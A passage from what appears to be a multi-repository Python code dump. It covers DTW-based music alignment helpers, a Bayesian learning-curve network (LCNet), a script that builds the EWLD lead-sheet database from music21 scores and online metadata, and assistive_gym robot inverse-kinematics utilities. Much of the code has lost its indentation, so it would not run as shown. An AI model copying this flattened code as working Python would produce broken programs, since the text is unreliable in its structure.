_x = x[start_x:end_x]
_y = y[start_y:end_y]
# pad the windows
if start_x == 0:
_x = [[0]] * (self.beta - i) + _x
elif end_x == N:
_x = _x + [[0]] * (i + self.beta - N)
if start_y == 0:
_y = [[0]] * (self.beta - j) + _y
elif end_y == M:
_y = _y + [[0]] * (j + self.beta - M)
# compute the local radius
lr = max(self.min_radius,
floor(self.alpha * self.dist_fn(_x, _y)))
# set the points inside the local radius to True
self.mask[slice(*idx_range(i, lr, N)),
slice(*idx_range(j, lr, M))] = True
if transpose:
self.mask = self.mask.T
def __call__(self, i, j, query_size=None, reference_size=None):
return self.mask[i, j]
def plot(self):
"""
Return a plotly Figure object representing the heatmap of the mask
"""
return px.imshow(self.mask, aspect='auto')
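    # Note: instances of FedeWindow are meant to be passed as the DTW windowing
    # function; __call__(i, j, query_size, reference_size) mirrors the signature
    # dtw-python uses for window functions (an assumption based on the keyword
    # names above) and simply looks up the precomputed boolean mask.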
def _remove_conflicting_match(arr_x: np.ndarray, arr_y: np.ndarray,
graph_matrix: np.ndarray, target: int):
"""
1. look for repeated values in `arr_x` or `arr_y`, depending on `target`
2. look for the maximum value in `graph_matrix[1]`, at the indices in
`arr_x` and `arr_y` relative to the repeated values
    3. among the repeated values in the target, choose the ones corresponding to
       the maximum in `graph_matrix[1]`
4. return `arr_x` and `arr_y` without the removed indices
"""
if target == 0:
_target = arr_x
elif target == 1:
_target = arr_y
else:
raise RuntimeError(f"`target` should be 0 or 1, used {target} instead")
arr_mask = np.ones(_target.shape[0], dtype=np.bool8)
unique_vals, unique_count = np.unique(_target, return_counts=True)
for unique_val in unique_vals[unique_count > 1]:
conflicting_idx = np.nonzero(_target == unique_val)[0]
to_keep_idx_of_idx = np.argmax(graph_matrix[1, arr_x[conflicting_idx],
arr_y[conflicting_idx]])
arr_mask[conflicting_idx] = 0
arr_mask[conflicting_idx[to_keep_idx_of_idx]] = 1
return arr_x[arr_mask], arr_y[arr_mask]
def merge_matching_indices(args):
"""
    Takes a list of mapping indices and fills the graph matrix counting the number
    of times a match happens in the mappings. Then starts taking matches from
    the most matched and iteratively adds new matches. If two conflicting
    matches have the same number of counts, takes the match which appears
    in the longest mapping; in case of parity the first one is taken
"""
# creating the matrix
num_notes = np.max([arg[:, 0].max() for arg in args]) + 1, np.max(
[arg[:, 1].max() for arg in args]) + 1
# dim 0 records the counts, dim 1 records the most long mapping containing
# the matching
graph_matrix = np.zeros((2, num_notes[0], num_notes[1]), dtype=np.int64)
# filling the matrix
for arg in args:
# the count
graph_matrix[0, arg[:, 0], arg[:, 1]] += 1
# the length
L = arg.shape[0]
graph_matrix[1, arg[:, 0], arg[:, 1]] = np.maximum(
graph_matrix[1, arg[:, 0], arg[:, 1]], L)
# merging
# two indices which records references to the original matrix
index_rows = np.arange(num_notes[0])
index_cols = np.arange(num_notes[1])
merged = []
for k in range(len(args), 0, -1):
# take matchings that appear `k` times
candidates_row, candidates_col = np.nonzero(graph_matrix[0] == k)
# remove conflicting candidates
candidates_row, candidates_col = _remove_conflicting_match(
candidates_row, candidates_col, graph_matrix, 0)
candidates_row, candidates_col = _remove_conflicting_match(
candidates_row, candidates_col, graph_matrix, 1)
# add candidates to the output
merged.append(
np.stack([index_rows[candidates_row], index_cols[candidates_col]],
axis=1))
# remove matched notes from graph_matrix
mask_rows = np.ones(graph_matrix.shape[1], dtype=np.bool8)
mask_cols = np.ones(graph_matrix.shape[2], dtype=np.bool8)
mask_rows[candidates_row] = 0
mask_cols[candidates_col] = 0
graph_matrix = graph_matrix[:, mask_rows]
graph_matrix = graph_matrix[:, :, mask_cols]
# remove matched notes from the index
index_rows = index_rows[mask_rows]
index_cols = index_cols[mask_cols]
# re-sort everything and return
merged = np.concatenate(merged, axis=0)
# print(f"Added notes from merging: {len(ref) - L}")
return merged[merged[:, 0].argsort()]
```
#### File: alignment/pybnn_module/lcnet.py
```python
from copy import deepcopy
import numpy as np
import torch
import torch.nn as nn
from pybnn.bohamiann import Bohamiann
from pybnn.util.layers import AppendLayer
def vapor_pressure(x, a, b, c, *args):
b_ = (b + 1) / 2 / 10
a_ = (a + 1) / 2
c_ = (c + 1) / 2 / 10
return torch.exp(-a_ - b_ / (x + 1e-5) - c_ * torch.log(x)) - (torch.exp(a_ + b_))
def log_func(t, a, b, c, *args):
a_ = (a + 1) / 2 * 5
b_ = (b + 1) / 2
c_ = (c + 1) / 2 * 10
return (c_ + a_ * torch.log(b_ * t + 1e-10)) / 10.
def hill_3(x, a, b, c, *args):
a_ = (a + 1) / 2
b_ = (b + 1) / 2
c_ = (c + 1) / 2 / 100
return a_ * (1. / ((c_ / x + 1e-5) ** b_ + 1.))
def bf_layer(theta, t):
y_a = vapor_pressure(t, theta[:, 0], theta[:, 1], theta[:, 2])
y_b = log_func(t, theta[:, 3], theta[:, 4], theta[:, 5])
y_c = hill_3(t, theta[:, 6], theta[:, 7], theta[:, 8])
return torch.stack([y_a, y_b, y_c], dim=1)
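# bf_layer stacks the three parametric learning-curve basis functions evaluated at
# budget t; Architecture.forward below combines them with softmax weights and an
# asymptotic term to form the predicted mean.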
def get_lc_net_architecture(input_dimensionality: int) -> torch.nn.Module:
class Architecture(nn.Module):
def __init__(self, n_inputs, n_hidden=50):
super(Architecture, self).__init__()
self.fc1 = nn.Linear(n_inputs - 1, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, n_hidden)
self.theta_layer = nn.Linear(n_hidden, 9)
self.weight_layer = nn.Linear(n_hidden, 3)
self.asymptotic_layer = nn.Linear(n_hidden, 1)
self.sigma_layer = AppendLayer(noise=1e-3)
def forward(self, input):
x = input[:, :-1]
t = input[:, -1]
x = torch.tanh(self.fc1(x))
x = torch.tanh(self.fc2(x))
x = torch.tanh(self.fc3(x))
theta = torch.tanh(self.theta_layer(x))
bf = bf_layer(theta, t)
weights = torch.softmax(self.weight_layer(x), -1)
residual = torch.tanh(torch.sum(bf * weights, dim=(1,), keepdim=True))
asymptotic = torch.sigmoid(self.asymptotic_layer(x))
mean = residual + asymptotic
return self.sigma_layer(mean)
return Architecture(n_inputs=input_dimensionality)
class LCNet(Bohamiann):
def __init__(self, **kwargs) -> None:
super(LCNet, self).__init__(get_network=get_lc_net_architecture,
normalize_input=True,
normalize_output=False,
**kwargs)
@staticmethod
def normalize_input(x, m=None, s=None):
if m is None:
m = np.mean(x, axis=0)
if s is None:
s = np.std(x, axis=0)
x_norm = deepcopy(x)
x_norm[:, :-1] = (x[:, :-1] - m[:-1]) / s[:-1]
return x_norm, m, s
``` |
{
"source": "00sapo/OpenEWLD",
"score": 3
} |
#### File: 00sapo/OpenEWLD/EWLDcreation.py
```python
import time
import argparse
import csv
import json
import operator
import os
import sys
import traceback
import zipfile
import sqlite3
from collections import defaultdict
from typing import List, Dict
import discogs_client
import requests
from music21 import converter, stream, note, chord, text, musicxml, features, key, harmony
def detectGenres(query: str, depth: int, num_of_items: int, client: discogs_client.Client)-> List:
""" detect genres using discogs client.
    :depth: number of songs to be used
    :num_of_items: number of items in the list returned
    :client: discogs client object
:returns: list of list of tuples:
[
[(genre1, occurrences), (genre2, occurrences), ...],
[(style1, occurrences), (style2, occurrences), ...]
]
"""
r = client.search(query, type='release')
r = r.sort('year')
# populate genres_stats list
genres_stats = defaultdict(int)
styles_stats = defaultdict(int)
r.per_page = depth
l = r.page(1)
for release in l:
genres = release.fetch('genre')
if genres is not None:
for k in genres:
genres_stats[k] += 1
if release.styles is not None:
for k in release.styles:
styles_stats[k] += 1
genres = []
styles = []
if len(genres_stats) > 0:
twoMostCommon(num_of_items, genres_stats, genres)
if len(styles_stats) > 0:
twoMostCommon(num_of_items, styles_stats, styles)
return [genres, styles]
def twoMostCommon(num_of_items, dictionary, listOfTuples):
for i in range(num_of_items):
if i < len(dictionary):
most_common_tuple = max(dictionary.items(),
key=operator.itemgetter(1))
dictionary.pop(most_common_tuple[0])
listOfTuples.append(most_common_tuple)
def getComposerInfoByUri(uri: str) -> Dict:
""":returns: same as @getComposerInfoByName"""
r = requests.get(uri, params={'format': 'json'})
data = json.loads(r.text)
if checkingErrors(data):
return getComposerInfoByUri(uri)
composer = {
'correct_name': data.get('commonName'),
'home_country': data.get('homeCountry'),
'birth': formatDate(data.get('birthDate')),
'death': formatDate(data.get('deathDate'))
}
return composer
def getComposerInfoByName(name: str) -> Dict:
""" :retuns: a dictionary containing the birth date, the death date, the
actual name and the nationality of the composer
"""
url = 'https://secondhandsongs.com/search/artist'
params = {
'format': 'json',
'commonName': name
}
resp = requests.get(url=url, params=params)
data = json.loads(resp.text)
if checkingErrors(data):
return getComposerInfoByName(name)
if len(data.get('resultPage') or '') == 0:
return None
artist_page = data['resultPage'][0]['uri']
return getComposerInfoByUri(artist_page)
def formatDate(date) -> str:
if date is None:
return None
tokens = str(date).split('-', 3)
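    # e.g. '1934' -> '1934-00-00', '1934-07' -> '1934-07-00', '1934-07-21' unchanged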
returned = ''
if len(tokens) == 1:
returned = tokens[0] + '-00-00'
elif len(tokens) == 2:
returned = tokens[0] + '-' + tokens[1] + '-00'
else:
returned = tokens[0] + '-' + tokens[1] + '-' + tokens[2]
return returned
def getWorkInfo(title: str, composer: str) -> Dict:
""" :returns: a dict with work info """
url = 'https://secondhandsongs.com/search/work'
params = {
'format': 'json',
'credits': composer,
'title': title
}
resp = requests.get(url=url, params=params)
data = json.loads(resp.text)
if checkingErrors(data):
return getWorkInfo(title, composer)
if len(data.get('resultPage') or '') == 0:
return None
work_page = data['resultPage'][0]['uri']
r = requests.get(work_page, params={'format': 'json'})
data = json.loads(r.text)
if checkingErrors(data):
return getWorkInfo(title, composer)
all_authors = []
for i in data.get('credits'):
all_authors.append(i.get('uri'))
work = {
'language': data.get('language'),
'correct_title': data.get('title'),
'correct_credits_uri': all_authors,
}
if data.get('original') is not None:
original_performance_page = data['original'].get('uri')
r = requests.get(original_performance_page,
params={'format': 'json'})
data = json.loads(r.text)
if checkingErrors(data):
return getWorkInfo(title, composer)
work['original_performance_date'] = formatDate(data.get('date'))
else:
work['original_performance_date'] = None
return work
def getTonality(score: stream.Score)-> key.Key:
""" :returns: a key.Key object representing tonality detected by Krumhanslschumckler
algorithm, only if its 'tonalCertainty()' is >= 0.9, None otherwise
"""
try:
estimated = score.analyze('key.krumhanslschmuckler')
except Exception:
return None
if estimated.tonalCertainty() < 0.9:
return None
else:
return estimated
def scoreIsCompatible(s: stream.Score) -> bool:
""" parse a s and returs True if it is compatible with our symbolic
representation system
This also sets the 'timeSignature', 'keySignature', 'incipitType' and
'hasTriplets' in compatible stream.Score objects
"""
# no multiple voices are allowed
print('checking compatibility...')
sc = s.explode()
# only one part is allowed
print('\tchecking parts (only one allowed)...')
if hasattr(sc, 'parts'):
if len(sc.parts) > 1:
return False
# only one key signature is allowed
print('\tchecking key signatures (only one allowed)...')
signatures = s.flat.getKeySignatures()
if len(signatures) > 1:
for signature in signatures:
if signature.asKey().name != signatures[0].asKey().name:
return False
# looking for the right tonality
estimated = getTonality(s)
if estimated is not None:
s.keySignature = estimated.asKey()
elif len(signatures) == 0:
return False
else:
s.keySignature = signatures[0].asKey()
# only one time signature is allowed
print('\tchecking time signatures (only one allowed)...')
signatures = s.flat.getTimeSignatures()
if len(signatures) > 1:
for signature in signatures:
if signature.ratioString != signatures[0].ratioString:
return False
elif len(signatures) == 0:
return False
measure_length = signatures[0].numerator / signatures[0].denominator * 4
s.timeSignature = signatures[0]
# no multiple white measures in incipit
# setting incipit type
print('\tchecking no multiple white measures at the beginning...')
for m in s.recurse().getElementsByClass(stream.Measure):
if len(m.recurse().getElementsByClass(note.Note)) == 0:
m.containerHierarchy()[0].remove(m)
else:
n = m.recurse().getElementsByClass(note.Note)[0]
if n.offset > 0:
s.incipitType = 'acefalo'
elif m.duration.quarterLength < measure_length:
s.incipitType = 'anacrusi'
else:
s.incipitType = 'tetico'
break
# no multiple white measures at the end
print('\tchecking no multiple white measures at the end...')
it = s.recurse().getElementsByClass(stream.Measure)
for m in reversed(it):
if len(m.recurse().getElementsByClass(note.Note)) == 0:
m.containerHierarchy()[0].remove(m)
else:
break
print('\tchecking triplets and chords...')
s.hasTriplets = False
noChordSymbol = True
it = s.flat.notesAndRests
i = 0
while i < len(it):
n = it[i]
if type(n) is harmony.ChordSymbol:
noChordSymbol = False
i += 1
continue
# no written chords allowed
if type(n) is chord.Chord:
print('----Chords are not allowed----')
return False
# triplets checking:
if len(n.duration.tuplets) > 0:
tuplet = n.duration.tuplets[0]
# only triplets are allowed
if tuplet.numberNotesActual > 3:
print('----Only triplets are allowed----')
return False
# the following is to check the nesting level
if tuplet.nestedLevel > 1:
print('----only one nested level is allowed----')
return False
# only if it is contained in one measure
if tuplet.totalTupletLength() > measure_length:
print('----tuplets are allowed only in the same measure----')
return False
s.hasTriplets = True
i += 3
else:
i += 1
if noChordSymbol:
print('----No chords annotated----')
return False
return True
def copyToDir(s: stream.Score, dir: str):
path = os.path.join(dir, s.metadata.composer +
'-' + s.metadata.title + '.xml')
s.write(fp=path)
def fixStrangeCharacters(title, composer):
composer = composer.translate(
{ord(c): " " for c in "!@#$%^&*()[]{};:,./<>?\|~-=_+"})
composer = composer.translate(
{ord(c): "'" for c in "`"})
title = title.translate(
{ord(c): " " for c in "@#$%^&*()[]{};:./<>\|~-=_+"})
title = title.translate(
{ord(c): "'" for c in "`"})
return title, composer
def writeCompressedMxl(xml: str, filename_without_extension: str,
filepath_without_extension: str):
zf = zipfile.ZipFile(filepath_without_extension + '.mxl', mode='w',
compression=zipfile.ZIP_DEFLATED)
zi = zipfile.ZipInfo('META-INF' + os.sep + 'container.xml')
zi.external_attr = 0o660 << 16
zf.writestr(zi,
"<?xml version='1.0' encoding='UTF-8'?>"
"<container><rootfiles><rootfile full-path='{0}.xml'/>"
"</rootfiles></container>".format(filename_without_extension))
zi = zipfile.ZipInfo(filename_without_extension + '.xml')
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = 0o660 << 16
zf.writestr(zi, xml)
zf.close()
def checkingErrors(response: Dict):
# checking errors
error = response.get('error')
if error is not None:
if error.get('code') == 10007:
print('too many requests... wait a bit and retry')
time.sleep(30)
return True
return False
def secondHandSongsInfo(s: stream.Score):
""" Queries secondhandsongs.com to gather work and composers info
    :returns: a tuple with the work dictionary and the list of composer dictionaries
"""
title = s.metadata.title
composer = s.metadata.composer
if title == '' or title is None or composer == '' or composer is None:
return {}, []
# removing strange characters
title, composer = fixStrangeCharacters(title, composer)
# trying to get work info
print('querying secondhandsongs.com for work and artists info...')
work = getWorkInfo(title, composer)
if work is None:
author = getComposerInfoByName(composer)
if author is not None:
work = getWorkInfo(title, author)
if work is None:
work = getWorkInfo(title, composer.split(None, 1)[0])
if work is None:
work = getWorkInfo(title, '')
if work is None:
return {}, []
# trying to get composers info
composers = []
for uri in work.get('correct_credits_uri'):
composers.append(getComposerInfoByUri(uri))
return work, composers
def collectData(s: stream.Score, new_dataset_dir: str, id: int, filename: str):
""" :returns: a dictionary containing 'name of table': 'entry as tuple'
or None if it is untreatable
"""
# collecting data
print('collecting data...')
work, composers = secondHandSongsInfo(s)
if 'correct_title' in work and len(composers) > 0:
# getting genres and styles
print('querying discogs for genre detection...')
discogs_query = work.get('correct_title') or ''
for c in composers:
correct_name = c.get('correct_name') or ''
discogs_query += ' ' + correct_name
if discogs_query == '':
genres = styles = []
else:
genres, styles = detectGenres(
discogs_query, depth=5, num_of_items=2, client=d)
else:
genres = styles = []
composers.append({'correct_name': '[Unknown]'})
if s.metadata.title != '':
work['correct_title'] = s.metadata.title
else:
work['correct_title'] = filename.split(
'_-_', 1)[-1].replace('_', ' ')
# lyrics
print('writing lyrics and leadsheet...')
lyrics = text.assembleAllLyrics(s).replace('\n', '')
# computing file name
output_dir = ''
for c in composers:
correct_name = c.get('correct_name') or ''
output_dir += correct_name + '-'
correct_title = work.get(
'correct_title').replace(' ', '_').replace('/', '-')
output_dir = output_dir[:-1].replace(' ', '_')
output_dir = os.path.join(
new_dataset_dir, output_dir, correct_title)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_path = os.path.join(output_dir, correct_title)
# writing lyrics file
with open(output_path + ".txt", "w") as lyrics_file:
print(lyrics, file=lyrics_file)
first_measure = s.recurse().getElementsByClass(stream.Measure)[0].number
s.measure(first_measure).timeSignature = s.timeSignature
s.measure(first_measure).keySignature = s.keySignature
# creating xml string (out is bytes in Py3)
xml = musicxml.m21ToXml.GeneralObjectExporter(s).parse().decode('utf-8')
# writing musicxml compressed file
writeCompressedMxl(xml, work['correct_title'], output_path)
# getting all features
print('computing features...')
f = features.base.allFeaturesAsList(s)
# writing features csv
# use features.base.getIndex('name') to get the row index of a certain
# feature, or something like [x.id for x in features.extractorsById('all')]
# to get the feature id at the same index position as in the csv
print('writing features...')
with open(output_path + '.csv', 'a') as features_file:
writer = csv.writer(features_file)
writer.writerows(f[0])
writer.writerows(f[1])
# creating output dictionary
data = createDataDictionary(
id, work, output_path, s, genres, styles, composers)
return data
def createDataDictionary(id, work, output_path, s, genres, styles, composers):
data = {
'works': [(id, work.get('correct_title'),
work.get('original_performance_date'),
work.get('language'), output_path + '.txt',
output_path + '.mxl')],
'features': [(id, s.timeSignature.ratioString, s.keySignature.name,
s.incipitType, s.hasTriplets, output_path + '.csv')],
'authors': [],
'work_genres': [],
'work_style': [],
'work_author': []
}
for genre in genres:
data['work_genres'].append((id, genre[0], genre[1]))
for style in styles:
data['work_style'].append((id, style[0], style[1]))
for composer in composers:
# here 'correct_name' is used twice because the second is needed to
# check that this author is not already inserted
data['authors'].append((composer.get('correct_name'), composer.get('birth'),
composer.get('death'), composer.get(
'home_country'),
composer.get('correct_name')))
data['work_author'].append((id, composer.get('correct_name')))
return data
class DBInterface():
""" A class to interface to the SQLite Database """
temp_data = {
'works': [],
'features': [],
'authors': [],
'work_author': [],
'work_genres': [],
'work_style': []
}
counter = 0
def firstIndex(self):
""" get the first available index of a work """
self.cursor.execute('select max(id) from works')
i = self.cursor.fetchone()[0]
if i is not None:
i += 1
else:
i = 0
return i
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __init__(self, path_to_db):
""" creates a new db at :path_to_db address using file named
'db_creation.sql' as starting point """
try:
self.connection = sqlite3.connect(path_to_db)
self.cursor = self.connection.cursor()
print("Reading SQL Script...")
scriptfilename = 'db_creation.sql'
scriptFile = open(scriptfilename, 'r')
script = scriptFile.read()
scriptFile.close()
self.cursor.executescript(script)
self.connection.commit()
except Exception:
print("can't create db... exiting")
traceback.print_exc()
sys.exit(3)
def addToDB(self, data):
""" add data to the database """
for k in data.keys():
self.temp_data[k] += data[k]
self.counter += 1
if self.counter == 10:
self.__commitData()
self.counter = 0
def __commitData(self):
print("____________ WRITING DATA TO DB _____________")
self.cursor.executemany(
'INSERT INTO works VALUES (?, ?, ?, ?, ?, ?)', self.temp_data['works'])
self.cursor.executemany(
'INSERT INTO authors SELECT ?, ?, ?, ? WHERE NOT EXISTS \
(SELECT 1 FROM authors WHERE common_name = ?)',
self.temp_data['authors'])
self.cursor.executemany(
'INSERT INTO features VALUES (?, ?, ?, ?, ?, ?)', self.temp_data['features'])
self.cursor.executemany(
'INSERT INTO work_author VALUES (?, ?)', self.temp_data['work_author'])
self.cursor.executemany(
'INSERT INTO work_genres VALUES (?, ?, ?)', self.temp_data['work_genres'])
self.cursor.executemany(
'INSERT INTO work_style VALUES (?, ?, ?)', self.temp_data['work_style'])
try:
self.connection.commit()
except Exception:
print("can't write to db... exiting")
traceback.print_exc()
sys.exit(3)
for k in self.temp_data.keys():
self.temp_data[k] = []
def __del__(self):
self.__commitData()
self.connection.close()
def main(dbManager):
# loading file names
parser = argparse.ArgumentParser()
parser.add_argument("--dir", "-d", type=str, required=True)
args = parser.parse_args()
if not os.path.isdir(args.dir):
print('Directory ' + args.dir + ' does not exists!')
sys.exit(2)
new_dataset_dir = 'dataset'
if not os.path.exists(new_dataset_dir):
os.makedirs(new_dataset_dir)
filenames = os.listdir(args.dir)
exception_dir = 'exception_dir'
if not os.path.exists(exception_dir):
os.makedirs(exception_dir)
not_compatible_dir = 'not_compatible'
if not os.path.exists(not_compatible_dir):
os.makedirs(not_compatible_dir)
id = dbManager.firstIndex()
for filename in filenames:
print('------------------------------------')
print('analysing ' + filename)
# opening file
pathname = os.path.join(args.dir, filename)
if not os.path.isfile(pathname):
continue
s = None
try:
s = converter.parse(pathname)
except KeyboardInterrupt:
return
except Exception:
print('invalid file' + pathname)
continue
try:
if scoreIsCompatible(s):
data = collectData(s, new_dataset_dir, id, filename)
if data is None:
composer_title_unknown_dir = 'unknown'
if not os.path.exists(composer_title_unknown_dir):
os.makedirs(composer_title_unknown_dir)
copyToDir(s, composer_title_unknown_dir)
else:
id += 1
print('adding score number ', id)
dbManager.addToDB(data)
os.remove(pathname)
else:
os.remove(pathname)
except Exception as e:
log_filename = os.path.join(exception_dir, filename)
s.write(fp=log_filename + '.xml')
with open(log_filename + ".log", "w") as log_file:
print(traceback.format_exc(), file=log_file)
d = discogs_client.Client(
'SMC application', user_token="<KEY>")
dbManager = DBInterface('EWLD.db')
main(dbManager)
del dbManager
``` |
{
"source": "00schen/asha",
"score": 2
} |
#### File: assistive_gym/envs/util.py
```python
import numpy as np
import pybullet as p
class Util:
def __init__(self, pid, np_random):
self.id = pid
self.ik_lower_limits = {}
self.ik_upper_limits = {}
self.ik_joint_ranges = {}
self.ik_rest_poses = {}
self.np_random = np_random
def ik_random_restarts(self, body, target_joint, target_pos, target_orient, world_creation, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, best_ik_joints = None, ik_indices=range(29, 29+7), max_iterations=1000, max_ik_random_restarts=50, random_restart_threshold=0.01, half_range=False, step_sim=False, check_env_collisions=False):
orient_orig = target_orient
best_ik_distance = 0
for r in range(max_ik_random_restarts):
target_joint_positions = self.ik(body, target_joint, target_pos, target_orient, mean_rest_pose=best_ik_joints, ik_indices=ik_indices, max_iterations=max_iterations, half_range=half_range)
world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(target_joint_positions), tool=None)
if step_sim:
for _ in range(5):
p.stepSimulation(physicsClientId=self.id)
if len(p.getContactPoints(bodyA=body, bodyB=body, physicsClientId=self.id)) > 0 and orient_orig is not None:
# The robot's arm is in contact with itself. Continually randomize end effector orientation until a solution is found
target_orient = p.getQuaternionFromEuler(p.getEulerFromQuaternion(orient_orig, physicsClientId=self.id) + np.deg2rad(self.np_random.uniform(-45, 45, size=3)), physicsClientId=self.id)
if check_env_collisions:
for _ in range(25):
p.stepSimulation(physicsClientId=self.id)
gripper_pos, gripper_orient = p.getLinkState(body, target_joint, computeForwardKinematics=True, physicsClientId=self.id)[:2]
if np.linalg.norm(target_pos - np.array(gripper_pos)) < random_restart_threshold and (target_orient is None or np.linalg.norm(target_orient - np.array(gripper_orient)) < random_restart_threshold or np.isclose(np.linalg.norm(target_orient - np.array(gripper_orient)), 2, atol=random_restart_threshold)):
return True, np.array(target_joint_positions)
if best_ik_joints is None or np.linalg.norm(target_pos - np.array(gripper_pos)) < best_ik_distance:
best_ik_joints = target_joint_positions
best_ik_distance = np.linalg.norm(target_pos - np.array(gripper_pos))
world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(best_ik_joints), tool=None)
return False, np.array(best_ik_joints)
def ik_jlwki(self, body, target_joint, target_pos, target_orient, world_creation, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, ik_indices=range(29, 29+7), max_iterations=100, success_threshold=0.03, half_range=False, step_sim=False, check_env_collisions=False):
target_joint_positions = self.ik(body, target_joint, target_pos, target_orient, ik_indices=ik_indices, max_iterations=max_iterations, half_range=half_range)
world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(target_joint_positions), tool=None)
if step_sim:
for _ in range(5):
p.stepSimulation(physicsClientId=self.id)
if len(p.getContactPoints(bodyA=body, bodyB=body, physicsClientId=self.id)) > 0:
# The robot's arm is in contact with itself.
return False, np.array(target_joint_positions)
if check_env_collisions:
for _ in range(25):
p.stepSimulation(physicsClientId=self.id)
gripper_pos, gripper_orient = p.getLinkState(body, target_joint, computeForwardKinematics=True, physicsClientId=self.id)[:2]
if np.linalg.norm(target_pos - np.array(gripper_pos)) < success_threshold and (target_orient is None or np.linalg.norm(target_orient - np.array(gripper_orient)) < success_threshold or np.isclose(np.linalg.norm(target_orient - np.array(gripper_orient)), 2, atol=success_threshold)):
return True, np.array(target_joint_positions)
return False, np.array(target_joint_positions)
def ik(self, body, target_joint, target_pos, target_orient, mean_rest_pose=None, ik_indices=range(29, 29+7), max_iterations=1000, half_range=False):
key = '%d_%d' % (body, target_joint)
if key not in self.ik_lower_limits:
self.ik_lower_limits[key] = []
self.ik_upper_limits[key] = []
self.ik_joint_ranges[key] = []
self.ik_rest_poses[key] = []
j_names = []
for j in range(p.getNumJoints(body, physicsClientId=self.id)):
if p.getJointInfo(body, j, physicsClientId=self.id)[2] != p.JOINT_FIXED:
joint_info = p.getJointInfo(body, j, physicsClientId=self.id)
lower_limit = joint_info[8]
upper_limit = joint_info[9]
if lower_limit == 0 and upper_limit == -1:
lower_limit = -2*np.pi
upper_limit = 2*np.pi
self.ik_lower_limits[key].append(lower_limit)
self.ik_upper_limits[key].append(upper_limit)
if not half_range:
self.ik_joint_ranges[key].append(upper_limit - lower_limit)
else:
self.ik_joint_ranges[key].append((upper_limit - lower_limit)/2.0)
j_names.append([len(j_names)] + list(joint_info[:2]))
self.ik_rest_poses[key] = self.np_random.uniform(self.ik_lower_limits[key], self.ik_upper_limits[key])
if mean_rest_pose is not None:
self.ik_rest_poses[key][ik_indices] = np.clip(self.np_random.normal(mean_rest_pose,0.5),np.array(self.ik_lower_limits[key])[ik_indices], np.array(self.ik_upper_limits[key])[ik_indices])
self.ik_rest_poses[key] = self.ik_rest_poses[key].tolist()
if target_orient is not None:
ik_joint_poses = np.array(p.calculateInverseKinematics(body, target_joint, targetPosition=target_pos, targetOrientation=target_orient, lowerLimits=self.ik_lower_limits[key], upperLimits=self.ik_upper_limits[key], jointRanges=self.ik_joint_ranges[key], restPoses=self.ik_rest_poses[key], maxNumIterations=max_iterations, physicsClientId=self.id))
else:
ik_joint_poses = np.array(p.calculateInverseKinematics(body, target_joint, targetPosition=target_pos, lowerLimits=self.ik_lower_limits[key], upperLimits=self.ik_upper_limits[key], jointRanges=self.ik_joint_ranges[key], restPoses=self.ik_rest_poses[key], maxNumIterations=max_iterations, physicsClientId=self.id))
target_joint_positions = ik_joint_poses[ik_indices]
return target_joint_positions
def points_in_cylinder(self, pt1, pt2, r, q):
vec = pt2 - pt1
const = r * np.linalg.norm(vec)
return np.dot(q - pt1, vec) >= 0 and np.dot(q - pt2, vec) <= 0 and np.linalg.norm(np.cross(q - pt1, vec)) <= const
def point_on_capsule(self, p1, p2, radius, theta_range=(0, np.pi*2)):
'''
Pick a random point along the outer surface of a capsule (cylinder)
'''
# Pick a random point along the length of the capsule
axis_vector = p2 - p1
random_length = self.np_random.uniform(radius, np.linalg.norm(axis_vector))
# Normalize axis vector to unit length
axis_vector = axis_vector / np.linalg.norm(axis_vector)
ortho_vector = self.orthogonal_vector(axis_vector)
# Normalize orthogonal vector to unit length
ortho_vector = ortho_vector / np.linalg.norm(ortho_vector)
# Determine normal vector through cross product (this will be of unit length)
normal_vector = np.cross(axis_vector, ortho_vector)
# Pick a random rotation along the cylinder
theta = self.np_random.uniform(theta_range[0], theta_range[1])
point = p1 + random_length*axis_vector + radius*np.cos(theta)*ortho_vector + radius*np.sin(theta)*normal_vector
return point
def capsule_points(self, p1, p2, radius, distance_between_points=0.05):
'''
Creates a set of points around a capsule.
Check out: http://mathworld.wolfram.com/ConicalFrustum.html
and: http://math.stackexchange.com/questions/73237/parametric-equation-of-a-circle-in-3d-space
sphere = [x, y, z, r]
'''
points = []
p1, p2 = np.array(p1), np.array(p2)
axis_vector = p2 - p1
# Normalize axis vector to unit length
axis_vector = axis_vector / np.linalg.norm(axis_vector)
ortho_vector = self.orthogonal_vector(axis_vector)
# Normalize orthogonal vector to unit length
ortho_vector = ortho_vector / np.linalg.norm(ortho_vector)
# Determine normal vector through cross product (this will be of unit length)
normal_vector = np.cross(axis_vector, ortho_vector)
# Determine the section positions along the frustum at which we will create point around in a circular fashion
sections = int(np.linalg.norm(p2 - p1) / distance_between_points)
section_positions = [(p2 - p1) / (sections + 1) * (i + 1) for i in range(sections)]
for i, section_pos in enumerate(section_positions):
# Determine radius and circumference of this section
circumference = 2*np.pi*radius
# Determine the angle difference (in radians) between points
theta_dist = distance_between_points / radius
for j in range(int(circumference / distance_between_points)):
theta = theta_dist * j
# Determine cartesian coordinates for the point along the circular section of the frustum
point_on_circle = p1 + section_pos + radius*np.cos(theta)*ortho_vector + radius*np.sin(theta)*normal_vector
points.append(point_on_circle)
return points
def orthogonal_vector(self, v):
'''
Two Euclidean vectors are orthogonal if and only if their dot product is zero.
'''
# Find first element in v that is nonzero
m = np.argmax(np.abs(v))
y = np.zeros(len(v))
y[(m+1) % len(v)] = 1
return np.cross(v, y)
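        # e.g. v = [3, 0, 0]: m = 0, y = [0, 1, 0], cross(v, y) = [0, 0, 3],
        # and dot(v, [0, 0, 3]) == 0 as required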
def line_intersects_triangle(self, p0, p1, p2, q0, q1):
# Check that the arm line segment intersects two different triangles defined by points around the sleeve.
# https://stackoverflow.com/questions/42740765/intersection-between-line-and-triangle-in-3d
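        # In words: the segment q0-q1 crosses the plane of triangle (p0, p1, p2) iff the
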